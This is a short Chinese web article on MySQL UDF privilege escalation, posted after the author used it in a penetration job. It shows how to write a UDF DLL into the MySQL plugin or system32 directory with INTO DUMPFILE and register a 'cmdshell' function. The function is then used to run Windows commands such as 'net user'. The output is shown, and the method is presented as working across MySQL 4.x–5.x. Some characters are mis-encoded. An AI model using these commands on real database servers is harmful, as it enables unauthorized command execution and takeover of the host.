mysql提權 udf方法更新
mysql提權 udf方法更新
文章錄入:7747.Net 責任編輯:7747.Net 更新時間:2011-1-21 10:38:18 39
【字體:小 大】
heimian
最近滲透時要用mysql udf,發(fā)現(xiàn)導出system32下的方法注冊不了DLL,原來一些mysql新版變到插件目錄了。
mysql> select @@version;
+———–+
| @@version |
+———–+
| 5.1.41 |
+———–+
1 row in set (0.00 sec)
mysql> select data from shell into DUMPFILE ‘.\\lib\\plugin\\UDF.DLL’;
ERROR 1 (HY000): Can’t create/write to file ‘\Program Files\xampp\mysql\data\lib\plugin\UDF.DLL’ (Errcode: 2)
mysql>
用這方法暴出了插件的安裝目錄.下面是通用的導出方法:
mysql> select data from shell into DUMPFILE ‘..\\lib\\plugin\\UDF.DLL’;
Query OK, 1 row affected (0.00 sec)
………………
mysql> select cmdshell(‘cmd.exe /c net user’);
\\ 的用戶帳戶
——————————————————————————-
__vmware_user__ Administrator ASPNET
Guest HelpAssistant SUPPORT_388945a0
把你的mysqludf改為:
select data from shell into DUMPFILE ‘..\\lib\\plugin\\UDF.DLL’;
select data from shell into DUMPFILE ‘c:\\windows\\system32\\UDF.DLL’;
select data from shell into DUMPFILE ‘c:\\UDF.DLL’; //某些版本只能在C盤根目錄
Create Function cmdshell returns string soname ‘UDF.DLL’;
這樣就比較通用了,對4.x-5.x都有效
關健詞:MYSQL,UDF
新文章:
- CentOS7下圖形配置網(wǎng)絡的方法
- CentOS 7如何添加刪除用戶
- 如何解決centos7雙系統(tǒng)后丟失windows啟動項
- CentOS單網(wǎng)卡如何批量添加不同IP段
- CentOS下iconv命令的介紹
- Centos7 SSH密鑰登陸及密碼密鑰雙重驗證詳解
- CentOS 7.1添加刪除用戶的方法
- CentOS查找/掃描局域網(wǎng)打印機IP講解
- CentOS7使用hostapd實現(xiàn)無AP模式的詳解
- su命令不能切換root的解決方法
- 解決VMware下CentOS7網(wǎng)絡重啟出錯
- 解決Centos7雙系統(tǒng)后丟失windows啟動項
- CentOS下如何避免文件覆蓋
- CentOS7和CentOS6系統(tǒng)有什么不同呢
- Centos 6.6默認iptable規(guī)則詳解